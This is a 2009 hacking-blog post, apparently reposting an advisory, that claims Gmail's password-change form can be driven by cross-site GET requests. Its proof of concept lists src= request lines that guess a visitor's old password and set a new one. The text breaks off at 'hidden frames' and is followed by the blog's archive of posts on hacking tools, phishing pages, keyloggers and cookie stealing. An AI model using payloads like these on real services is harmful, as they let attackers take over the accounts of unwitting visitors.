Summary
Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations".
Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.
GMail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
An attacker can create a page that includes requests to the "Change password" functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker.
The attack is facilitated since the "Change Password" request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the "Change Password" form.
DETAILS
Proof of concept:
1. An attacker create a web page "csrf-attack.html" that realize many HTTP GET requests to the "Change Password" functionality.
For example, a password cracking of 3 attempts (see "OldPasswd" parameter):
...
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...
or with hidden frames:
...
- Anonymous Mass Mailers (1)
- bots (1)
- browser (1)
- cool links (1)
- cracking tools (3)
- dos commands (3)
- ebooks (104)
- Exploits (14)
- file upload (3)
- firefox (1)
- flash games (2)
- free space (2)
- gmail (1)
- google (7)
- google chrome Vulnerability (7)
- graphics (5)
- greasemonkey scripts (8)
- gtalk (4)
- hacking (12)
- hacking ebooks (45)
- hacking tools (42)
- hacking tutorials (22)
- haking tutorials (37)
- hosting (1)
- image hosting (1)
- information (11)
- invisible (2)
- IP Scanner (14)
- java (2)
- javascript (4)
- keygen (1)
- Keyloggers (3)
- magazine (1)
- Mail Bombers (1)
- mcse (1)
- muliti login (1)
- networking (2)
- news (9)
- orkut (15)
- Port Scanner (14)
- proxy (2)
- RapidShare Libraries (1)
- regedit (1)
- Sniffers (1)
- sniffing (1)
- sql injection (5)
- tips n trics (41)
- upload sites (3)
- virus (9)
- virus removal (6)
- visual c++ (2)
- Vulnerability Scanner (1)
- wallpapers (5)
- web based hackiing (1)
- web design (1)
- web templates (1)
- Wireless Hacking (5)
-
▼
2009
(127)
- ► August 2009 (33)
-
▼
July 2009
(37)
- 500 Hacking Tutorials 2009
- Netgear WG102 Leaks SNMP Write Password with Read ...
- Openfire Multiple Vulnerabilities
- Vulnerability in Server Service Allows Code Execut...
- GMail Service CSRF Vulnerability
- Buffer Overflow Exploitation and Prevention
- Remote Exploitation with C and Perl
- How to write remote exploits (V. 1.1)
- Cisco Unified Communications Manager IP Phone Pers...
- Shellcode locations and buffer overflows in Windows
- Simple Machines Forum (SMF) 1.1.6 Remote Code Exec...
- Unset Permission on Adata.inc
- Apache vulnerabilities
- Crack WEP with Windows Vista BY "J.Style"
- Wireless Hacking -- Part 1
- Wireless Hacking -- Part 2
- Wireless Hacking -- Part 3
- AiroWizard WEP Cracking on Windows (GUI)
- Wireless WEP Key Password Spy v1.1
- How to open the cmd when it is blocked by your adm...
- Learn about Packet sniffing.
- Run Line Commands
- about dos
- Really Fast Proxy !!
- Network and Its Security
- List Of All Windows Executable Extensions
- Telnet Hacking
- Cookie Stealing Basics
- NetBios explained
- List of Ports commonly used by Trojans
- RapidHack 4.5 Immortality Edition
- Should not scanned (military & govt IP's)
- Fake pages for PHISHING
- Legal Sql Injection Pentesting
- SQL INJECTION TUTORIAL
- SQL injection
- SQL strings for SQL authentication Bypass....
- ► March 2009 (40)
- ► February 2009 (17)
-
►
2008
(211)
- ► November 2008 (13)
- ► September 2008 (198)
Blog Archive
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment